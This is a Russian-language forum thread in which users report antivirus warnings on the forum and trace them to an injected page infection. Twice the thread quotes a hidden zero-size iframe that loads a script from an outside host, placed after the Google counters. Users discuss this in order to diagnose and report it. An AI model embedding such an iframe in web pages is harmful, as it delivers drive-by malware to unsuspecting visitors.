Ахтунг, на форуме вирус

Это админы должны позаботится
На форуме вирус....

Вложения

• cxema.JPG
    cxema.JPG
    27,5 KB · Просмотры: 339
Ёёё... вот только что Safari ругнулся, что сайт подозрительный, хотя пару минут назад спокойно заходил. Причем, сослался что сайт занесен в черный список на Гугле. Происки конкурентов?

romchik19, дайте на него прямую ссылку! Почему, хотя у многих здесь антивирусы, лицензионные, регулярно обновляющиеся, а вирус находит у единиц?)

В каком месте?) У меня KIS6, регулярно обновляется - ноль эмоций.
Ну вы-бы еще четвертым бы пользовались)) :tease: Я в свое время отказался от шестого именно по тому что он устарел сильно) Базы тут не причем.

HEUR - это еще не 100% вирус, а подозрение на него по результатам эвристического анализа. Может конечно это новый вирус, но у Каспера еще нет сигнатур на его лечение, а может просто ложное срабатывание, что при эвристике бывает.

Сунулся экперимента ради экплорером - ага, точно есть такое, аваст матерится.

1244807917-clip-24kb.png

Опере по болту )))

Дак сайт ссылается на какую-то ссылку при этом которую собственно каспер и блокирует)

конкретно ht_tp://naemnitibo.in/cn.php?hyc

ну на срине она вообщето есть, но я проглядел)

Последнее редактирование:
FeelGood, модуль Internet Security у него обновлен и не слабее новых, кстати.
Скорее всего это действительно эвристический анализ пищит)) Тем более, что по ссылке, на которую матерятся - ничего нет;)

ну дык, теперь единственный вопрос к админам что делают нулевые ифреймы в низу после счетчиков гугл на страницах форума с сайтом naemnitibo.in

Код:
счетчики гугла. далее  <..>
<iframe src="http://naemnitibo.in/cn.php?hyc" width="0" height="0"></iframe>

кстати, поиск в гугле тоже покажет не мало аналогичных форумов

• Like
Реакции: Novation
Одно время сайты поражали подобные вирусы. Они заливались по фтп и встраивались в страницы. Наверно новая эпидемия.
В опере и файрфокс все нормально.
В IE проблема актуальна, комп отправляется в ребут и на десктопе появляется следующее:
42236629.jpg

Последнее редактирование:
В IE проблема актуальна? комп отправляет в ребут и на десктопе появляется следующее:

Ну ты и скриншотище запостил, аж в глазах потемнело))

Судя по тому, что вирус лезет из айфрейма
Код:
<iframe src="http://naemnitibo.in/cn.php?hyc" width="0" height="0"></iframe>
проблема актуальна только для пользователей IE

Форумы здесь вобще не причем. Вирус имеет свойство встраиваться в любой html/php код, не важно форум это или любой другой сайт.

Serdceedov, для мозилы 3.0.1 проблема не актуальна.

Так есть вирус или нет,или только подозрение? Я просканировал DrWeb 5 на XP и NOD32 4 на семёрке - ничего...Оба антивиря ежедневно обновляются!

Сейчас просматривают